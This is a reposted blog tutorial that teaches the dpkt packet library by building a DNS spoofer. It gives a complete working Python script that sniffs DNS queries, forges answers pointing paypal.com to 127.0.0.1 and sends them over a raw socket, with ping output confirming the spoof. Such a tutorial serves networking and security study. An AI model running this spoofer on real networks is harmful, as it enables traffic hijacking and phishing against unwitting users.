dpkt Tutorial #3: DNS Spoofing
2011-05-05 16:12
176 查看
dpkt Tutorial #3: DNS Spoofing
In our first and second dpkt tutorials, we looked at the simple construction and parsing of packets respectively. Our third tutorial combines both parsing and construction of packets in a single utility for performing DNS spoofing (a la dsniff’s dnsspoof).In this tutorial, we’ll use dpkt to parse DNS requests observed on the wire and construct spoofed DNS responses to send back. We’ll also be using the dnet and pypcap libraries in this example. Since you’ve certainly read the first two tutorials before this one, we will assume you are familiar with the basic methods of parsing and constructing packets using dpkt.
One of the most common usages of dpkt is to parse packets off the wire, which pypcap makes easy. We’ll start off by setting pypcap’s BPF expression to “udp dst port 53″ since we only want to look at DNS queries and parse each of the packets handed to us using dpkt:
pc = pcap.pcap() pc.setfilter('udp dst port 53') for ts, pkt in pc: eth = dpkt.ethernet.Ethernet(pkt) ip = eth.data udp = ip.data dns = dpkt.dns.DNS(udp.data)
Next, we need to perform some validation on the parsed DNS payload since we only want to spoof responses to legitimate DNS queries. In this next snippet, we ensure that the DNS payload is indeed a query, has a single RR in the question section, has no answer or nameserver RRs, and that the RR in the question section is for an A record and the IN class:
if dns.qr != dpkt.dns.DNS_Q: continue if dns.opcode != dpkt.dns.DNS_QUERY: continue if len(dns.qd) != 1: continue if len(dns.an) != 0: continue if len(dns.ns) != 0: continue if dns.qd[0].cls != dpkt.dns.DNS_IN: continue if dns.qd[0].type != dpkt.dns.DNS_A: continue
As seen from the above snippet, the dpkt DNS module parses the various sections of the DNS payload (qd, an, ns, ar) into python lists. This will come in handy later when constructing our response. In addition to validating the DNS payload, we only want to spoof responses for particular domains. In this case, we’ll only spoof responses for paypal.com:
if dns.qd[0].name != 'paypal.com': continue
Now that we’ve parsed and decoded the DNS query, we need to construct our spoofed response and send it back to the client. Instead of constructing a new packet from scratch, we can simply reuse the existing one and modify it appropriately. We start by setting the attributes of the DNS header indicating that it is a response:
dns.op = dpkt.dns.DNS_RA dns.rcode = dpkt.dns.DNS_RCODE_NOERR dns.qr = dpkt.dns.DNS_R
Next, we need to create our fake RR that will be included in the answer section of the DNS response. We do this by creating an object of the type dpkt.dns.DNS.RR and filling in its attributes:
arr = dpkt.dns.DNS.RR() arr.cls = dpkt.dns.DNS_IN arr.type = dpkt.dns.DNS_A arr.name = 'paypal.com' arr.ip = dnet.addr('127.0.0.1').ip
For the purposes of this tutorial, our spoofed answer RR will claim that paypal.com is at 127.0.0.1. We now need to add this newly created RR to the answer section of the DNS payload. Since dns.an is a python list, we can simply append the arr object to it:
dns.an.append(arr)
If we print out the dns object, we can see the correct RRs in the question and answer sections:
>>> print dns DNS(an=[RR(name='paypal.com')], qd=[Q(name='paypal.com')], id=21825, op=32896)
Now that our DNS payload is complete, we must fix up the UDP and IP layers of our original packet. Since we’re reusing the existing packet and want to send the reply back to the client while acting like we’re the server, we can just swap the src/dst ports and addresses:
udp.sport, udp.dport = udp.dport, udp.sport ip.src, ip.dst = ip.dst, ip.src
Next, we need to tack on our new DNS payload. We do this by assigning the dns object to the udp object’s data attribute. And since we’ve modified the length of the DNS payload, we need to update the length attributes of the UDP and IP layers appropriately:
udp.data = dns udp.ulen = len(udp) ip.len = len(ip)
We can take a look at our full payload containing the IP, UDP, and DNS payloads:
>>> print ip IP(src='\x8d\xd5\x04\x04', off=16384, dst='\x8d\xd4n\xa3', sum=3577, len=72, p=17, id=40555, data=UDP(dport=49008, sum=36486, sport=53, ulen=52, data=DNS(an=[RR(name='paypal.com')], qd=[Q(name='paypal.com')], id=21825, op=32896)))
Finally, we can checksum and send out the payload buffer through our raw socket:
buf = dnet.ip_checksum(str(ip)) sock.send(buf)
That concludes this dpkt tutorial! When we run the DNS spoofing script and attempt to contact paypal.com, we see that it successfully spoofs the reply:
jonojono@jonojono ~ $ ping paypal.com PING paypal.com (127.0.0.1) 56(84) bytes of data. 64 bytes from localhost (127.0.0.1): icmp_seq=1 ttl=64 time=0.022 ms ...
The full python script for this tutorial follows:
#!/usr/bin/env python
import dnet, dpkt, pcap
sock = dnet.ip()
pc = pcap.pcap()
pc.setfilter('udp dst port 53')
for ts, pkt in pc:
# parse the packet
eth = dpkt.ethernet.Ethernet(pkt)
ip = eth.data
udp = ip.data
dns = dpkt.dns.DNS(udp.data)
# validate the DNS query
if dns.qr != dpkt.dns.DNS_Q: continue if dns.opcode != dpkt.dns.DNS_QUERY: continue if len(dns.qd) != 1: continue if len(dns.an) != 0: continue if len(dns.ns) != 0: continue if dns.qd[0].cls != dpkt.dns.DNS_IN: continue if dns.qd[0].type != dpkt.dns.DNS_A: continue
# only spoof for our target name
if dns.qd[0].name != 'paypal.com': continue
# transform DNS query into response
dns.op = dpkt.dns.DNS_RA dns.rcode = dpkt.dns.DNS_RCODE_NOERR dns.qr = dpkt.dns.DNS_R
# construct our fake answer RR
arr = dpkt.dns.DNS.RR() arr.cls = dpkt.dns.DNS_IN arr.type = dpkt.dns.DNS_A arr.name = 'paypal.com' arr.ip = dnet.addr('127.0.0.1').ip
dns.an.append(arr)
# fix up IP and UDP layers
udp.sport, udp.dport = udp.dport, udp.sport ip.src, ip.dst = ip.dst, ip.src
udp.data = dns udp.ulen = len(udp) ip.len = len(ip)
print `ip`
# send out spoofed response
buf = dnet.ip_checksum(str(ip)) sock.send(buf)
相关文章推荐
- 使用 GIT PUSH 出错:WARNING: POSSIBLE DNS SPOOFING DETECTED!
- WARNING: POSSIBLE DNS SPOOFING DETECTED! 解决
- ssh时遇到 WARNING: POSSIBLE DNS SPOOFING DETECTED! 的解决方法
- POSSIBLE DNS SPOOFING DETECTED! 错误解决方案
- 【IERG4130学习笔记】DNS Spoofing via Birthday Attack
- 用ssh时 提示WARNING: POSSIBLE DNS SPOOFING DETECTED!处理方法
- ssh WARNING: POSSIBLE DNS SPOOFING DETECTED! 问题解决
- ssh不能连接 提示WARNING: POSSIBLE DNS SPOOFING DETECTED!处理方法
- SSH Got WARNING: 'POSSIBLE DNS SPOOFING DETECTED'
- 无法清除DNS缓存的解决办法
- 计算机DNS缓存列表如何清除?win7 DNS缓存的清除教程
- Google清理dns缓存的地址
- AD集成DNS区域记录重建及恢复
- 【CH Round #48 - Streaming #3】比赛题解 & 总结
- WebStorm 打开浏览器出现 Network Error (dns_unresolved_hostname) 的问题
- DNS服务中几种区域的区别
- DNS(四)--DNS编译安装
- DNS基础-1
- 关于windows 2003 DNS 有些网址无法解析的问解决
- 根据DNS的A记录负载均衡web服务请求 推荐